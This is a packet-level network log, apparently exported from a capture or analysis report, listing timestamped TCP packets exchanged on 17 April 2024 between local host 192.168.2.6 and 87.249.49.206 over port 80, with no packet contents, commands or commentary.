                                                                  Apr 17, 2024 16:51:41.442291021 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442295074 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442305088 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442322969 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442401886 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442413092 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442423105 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442434072 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442439079 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442449093 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442456007 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442465067 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442475080 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442482948 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442492008 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442502022 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442507029 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442517042 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442527056 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442537069 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442540884 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442552090 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442559004 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442567110 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442583084 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442588091 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442599058 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442608118 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442619085 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442625046 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442636967 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.442642927 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.442683935 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.475195885 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475236893 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475275040 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475298882 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.475333929 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475351095 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475368023 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475384951 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475399971 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475416899 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475433111 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475450039 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475466967 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475482941 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475501060 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475512981 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475522995 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.475522995 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.475522995 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.475522995 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.475523949 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.475534916 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.475543976 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475557089 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.475578070 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.525520086 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.539355993 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539393902 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539429903 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539467096 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539501905 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539536953 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539557934 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.539557934 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.539586067 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.539618015 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539653063 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539688110 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539706945 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.539738894 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539767027 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539788008 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.539793968 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539818048 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539829969 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.539844036 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539855003 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539865017 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539872885 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.539881945 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539892912 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.539899111 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.539927006 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.673593044 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.673614025 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.673625946 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.673639059 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.673650026 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.673661947 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.673675060 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.673687935 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.673696041 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.673712969 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.673728943 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.675184011 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.675240040 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.675544977 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.675558090 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.675596952 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.675910950 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.675924063 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.675962925 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.676085949 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677676916 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677689075 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677697897 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677707911 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677717924 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.677725077 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677736044 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677747965 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.677752018 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677776098 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.677792072 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.677836895 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677849054 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677859068 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677867889 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677879095 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.677885056 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677896023 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677905083 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.677911997 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677922010 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677931070 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.677937984 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677947044 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.677953959 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677963972 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677973986 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677983046 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.677989960 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.677999973 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678006887 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678015947 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678026915 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678031921 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678040981 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678050995 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678064108 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678069115 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678077936 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678083897 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678093910 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678105116 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678117037 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678122044 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678132057 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678139925 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678147078 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678158045 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678167105 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678174973 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678186893 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678191900 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678201914 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678229094 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678236008 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678245068 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678253889 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678263903 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678270102 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678278923 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678286076 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678296089 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678307056 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678314924 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678323030 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678333044 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678343058 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678349972 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678364992 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678374052 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678385019 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678399086 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678406000 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678414106 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678423882 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678433895 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678438902 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678447962 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678453922 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678463936 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678493977 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678504944 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678514004 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678519011 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678529024 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678536892 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678543091 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678550959 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678556919 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678565025 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678575039 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678585052 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678591967 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678601980 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678611994 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678618908 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678627968 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678633928 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678642988 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678647995 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678657055 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678663969 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678673983 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678684950 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678690910 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678699970 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678710938 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678719044 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678728104 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678739071 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678746939 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678754091 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678764105 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678770065 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678780079 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678792000 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678796053 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678805113 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678814888 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678822994 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678831100 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678837061 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678844929 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678852081 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678860903 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678870916 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678880930 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678890944 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678900003 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678906918 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678915024 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678925991 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678931952 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678940058 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678946018 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678953886 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678961992 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678967953 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678978920 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.678985119 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.678994894 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679004908 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679016113 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679022074 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679030895 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679040909 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679047108 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679055929 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679061890 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679070950 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679083109 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679088116 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679097891 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679111958 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679119110 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679126024 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679136038 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679141998 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679150105 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679158926 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679168940 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679173946 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679182053 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679188967 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679197073 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679207087 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679213047 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679222107 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679231882 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679239988 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679250956 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679258108 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679267883 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679277897 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679286003 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679294109 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679302931 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679308891 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679318905 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679325104 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679335117 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679344893 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679349899 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679359913 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679369926 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679378986 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679384947 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679395914 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679402113 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679410934 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679419994 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679429054 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679438114 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679449081 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679455042 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679462910 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679476976 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679481983 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679490089 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679500103 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679510117 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679513931 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679524899 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679532051 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679539919 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679549932 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679555893 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679563999 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679574966 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679584980 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679589033 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679598093 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679605007 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679613113 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679622889 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679627895 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679632902 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679641962 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679650068 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679656982 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679666996 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679677010 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679685116 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679692984 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679703951 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.679709911 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.679718971 CEST804972287.249.49.206192.168.2.6
